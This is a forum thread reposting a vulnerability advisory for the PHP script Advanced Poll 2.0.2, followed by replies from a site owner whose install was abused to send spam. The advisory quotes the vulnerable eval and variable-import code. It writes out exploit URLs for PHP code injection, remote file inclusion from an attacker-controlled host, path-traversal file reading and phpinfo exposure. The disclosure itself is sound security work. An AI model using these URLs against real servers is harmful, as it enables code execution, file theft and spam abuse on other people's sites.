If you are not registered or logged in, you may still use these forums but with limited features. Show recent topics
  [Search] Search   [Hottest Topics] Hottest Topics   [Members]  Member Listing   [FAQ]  FAQ 
[Register] Register / 
[Login] Login 
Advanced Poll Remote Information Disclosure Vulnerability  XML
Forum Index » General Discussion
Author Message
Jam'n
Graduate
[Avatar]

Joined: 07/01/2003 17:31:39
Messages: 166
Location: Netherlands
Offline

It seems there is also a bug Advanced Poll 2.0.2


°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo



PHP Code/Location :
°°°°°°°°°°°°°°°°°°°


comments.php :


------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");


for ($i=0;$i<sizeof($register_poll_vars);$i++) {
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------




booth.php, png.php :


---------------------------------------------------------------
<?php


$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}


if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}


require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------



poll_ssi.php, popup.php :


----------------------
include "./booth.php";
----------------------





admin/common.inc.php :


---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}


$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------



In the /admin/ directory, in the files :


- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php


:


------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);


require "./common.inc.php";
[...]
------------------------------------



misc/info.php :


-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------



Exploits :
°°°°°°°°


- if magic_quotes_gpc=OFF :


http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//


or with a POST form or cookies.


- This will only work if register_globals=OFF (this is not an error...) :


http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php


- This will work if register_globals=OFF OR ON :


http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.


The same hole can be found, in the /admin/ directory, in the files :


- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php


but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view



- http://[target]/misc/info.php will show the phpinfo().



Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .



Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info

Jam'n


------------------------------------------------

Only the man who's truly educated
understands that he knows very little...

------------------------------------------------
[WWW]
hailstone
Newbie

Joined: 06/06/2008 08:05:28
Messages: 3
Offline

I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.

I hope this has been fixed in newer versions (I couldn't find a change log to check) before it happens to someone else.
Carbonize
Master
[Avatar]

Joined: 12/06/2003 19:26:08
Messages: 4289
Location: Bristol, UK
Offline

This is why you should always make sure your scripts are up to date.

Carbonize
I am not the maker of the Advanced Guestbook

get Lazarus
[Email] [WWW] [Yahoo!] aim icon [MSN] [ICQ]
hailstone
Newbie

Joined: 06/06/2008 08:05:28
Messages: 3
Offline

Yes. Does that mean it is fixed?
Carbonize
Master
[Avatar]

Joined: 12/06/2003 19:26:08
Messages: 4289
Location: Bristol, UK
Offline

To the best of my knowledge but as no changelog is produced and I am not a user of the Poll I couldn't say.

Carbonize
I am not the maker of the Advanced Guestbook

get Lazarus
[Email] [WWW] [Yahoo!] aim icon [MSN] [ICQ]
hailstone
Newbie

Joined: 06/06/2008 08:05:28
Messages: 3
Offline

Ok, thanks for your help.
indi456
Newbie

Joined: 03/04/2009 20:50:55
Messages: 3
Offline

I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.
 
Forum Index » General Discussion
Go to:   
Based on the open source JForum